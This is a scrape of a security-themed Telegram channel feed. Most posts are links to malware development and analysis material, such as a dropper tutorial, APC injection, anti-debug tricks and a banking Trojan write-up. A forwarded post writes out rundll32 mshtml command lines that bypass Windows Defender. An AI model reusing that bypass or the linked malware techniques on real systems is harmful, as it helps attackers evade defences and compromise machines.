Source Byte – Telegram
Source Byte
7.76K subscribers
846 photos
73 videos
678 files
1.68K links
هشیار کسی باید کز عشق بپرهیزد
وین طبع که من دارم با عقل نیامیزد
Saadi Shirazi 187
Download Telegram
An experimental, in-development, malicious software with RCE, and Data Exfiltration capabilities as a core.

Link
#malware_dev
———
@islemolecule_source
👍4🔥1
Learn to create Native Dropper
Link

#malware_dev
———
@islemolecule_source
👍4
Rdtsc anti-debug instruction

Link

#malware_dev
#malware_analysis
———
@islemolecule_source
🤩21
Red team road map
Intern / junior / medium / senior
Red team needed concepts

Credit : Sohiel Hashemi


https://xmind.app/m/9Zcnkq

#red_team ,

———
@islemolecule_source
😁6🎃41👍1
How should I activate my Linux 🤔
😁7👀4
Forwarded from Darkside
Forwarded from Darkside
Hash_Suite_Pro_3_7_5.zip
21.7 MB
1
Coyote: A multi-stage banking Trojan abusing the Squirrel installer
Link

#malware_analysis
———
@islemolecule_source
😁41
Forwarded from vx-underground
We are preparing for Valentine's day. We are now known as vx-uwu
🤣4😁2
پیاده سازی APC Injection در C

Link

#malware_dev
———
@islemolecule_source
👍8
Analyzing Mutation Coded VM Protect
Link

#packer
———
@islemolecule_source
Cracking the Coding Interview - DevTwitter.pdf
7.7 MB
Cracking the coding interview
#books
———
@islemolecule_source
Forwarded from Proxy Bar
Windows Defender Detection Mitigation Bypass Vulnerability
Win LPE
В 2022 году hyp3rlinx рассказывал как можно обойти windows defender передав дополнительный путь при ссылке на mshtml, дырку пофиксили. НО, добавив пару запятых в старый трюк - и опять bypass.
*
то есть было и пофиксили:
C:\sec>rundll32.exe javanoscript:"\..\..\mshtml,RunHTMLApplication ";alert(666)
магия запятой:
C:\sec>rundll32.exe javanoscript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)
собака старая, трюки новые.
CVE пока не имеет )

#defender #bypass
👍4
From CreateProcess() to NtCreateUserProcess()Link
Link


#malware_dev
———
@islemolecule_source